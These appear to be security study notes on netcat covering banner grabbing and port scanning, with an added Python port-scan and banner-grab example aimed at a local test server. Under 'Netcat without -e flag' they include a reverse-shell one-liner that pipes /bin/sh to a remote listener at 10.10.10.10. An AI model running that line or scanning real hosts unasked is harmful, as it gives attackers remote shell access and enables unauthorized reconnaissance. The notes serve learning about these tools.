Netcat

  • TCP/IP Swiss Army Knife - we will use this tool a lot

  • Can scan ports but can also be used for:

    • chatting between two computers

    • banner grabbing

    • file transfer

    • for shell

  • Traffic is not encrypted (unless you use ncat with its TLS option)

nc -v google.com 80

nc connects to the Google server if port 80 is open, and we can then talk to it manually. For example,

after connecting, we can type an HTTP request using a method such as GET, HEAD or OPTIONS, and the server will return its response (useful for banner grabbing)

Netcat without -e flag

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 4443 >/tmp/f

Port Scanning

 nc -nv -w 1 -z 192.168.1.1 1-1024
 
-n = numeric only, doesn't resolve DNS
-v = verbose output
-w 1 = sets the connection timeout to 1 second
-z = zero-I/O mode: only check whether the port accepts a connection, without sending any data
-u = UDP mode (results can be unreliable, since a closed UDP port does not always answer)
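As an added example (not part of the original notes), the Python below reimplements what `nc -nv -w 1 -z` does per port (a TCP connect with no data sent) and what a manual HEAD request after `nc -v host 80` returns. It runs against a constructed loopback HTTP responder, so it works offline; the hostnames, ports and server banner are assumptions for the demonstration.

```python
import socket
import threading
from contextlib import closing

def scan_ports(host, ports, timeout=1.0):
    """Equivalent of `nc -n -w <timeout> -z host port` for each port:
    connect(), send nothing, close. Returns the ports that accepted."""
    open_ports = []
    for port in ports:
        with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
            s.settimeout(timeout)                 # -w: give up after timeout
            try:
                s.connect((host, port))           # -z: connect only, no I/O
                open_ports.append(port)
            except OSError:                       # refused, filtered or timed out
                pass
    return open_ports

def grab_http_banner(host, port, timeout=1.0):
    """What you would type after `nc -v host 80`: send a HEAD request and
    return the status line and headers the server answers with."""
    request = f"HEAD / HTTP/1.0\r\nHost: {host}\r\n\r\n".encode()
    with closing(socket.create_connection((host, port), timeout=timeout)) as s:
        s.sendall(request)
        data = b""
        while b"\r\n\r\n" not in data:            # read until end of headers
            chunk = s.recv(4096)
            if not chunk:
                break
            data += chunk
    return data.split(b"\r\n\r\n", 1)[0].decode(errors="replace")

def start_fake_http_server():
    """Constructed test target: a minimal loopback responder so the example
    runs offline. Returns the port it listens on (chosen by the OS)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    def serve():
        while True:
            conn, _ = srv.accept()
            with closing(conn):
                try:
                    conn.settimeout(1.0)
                    conn.recv(4096)               # a -z probe sends nothing here
                    conn.sendall(b"HTTP/1.0 200 OK\r\nServer: constructed-test/1.0\r\n\r\n")
                except OSError:
                    pass                          # probe closed early; ignore
    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]
```

Run `scan_ports("127.0.0.1", [start_fake_http_server()])` to see the listener reported open, then `grab_http_banner` on the same port to read its headers.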
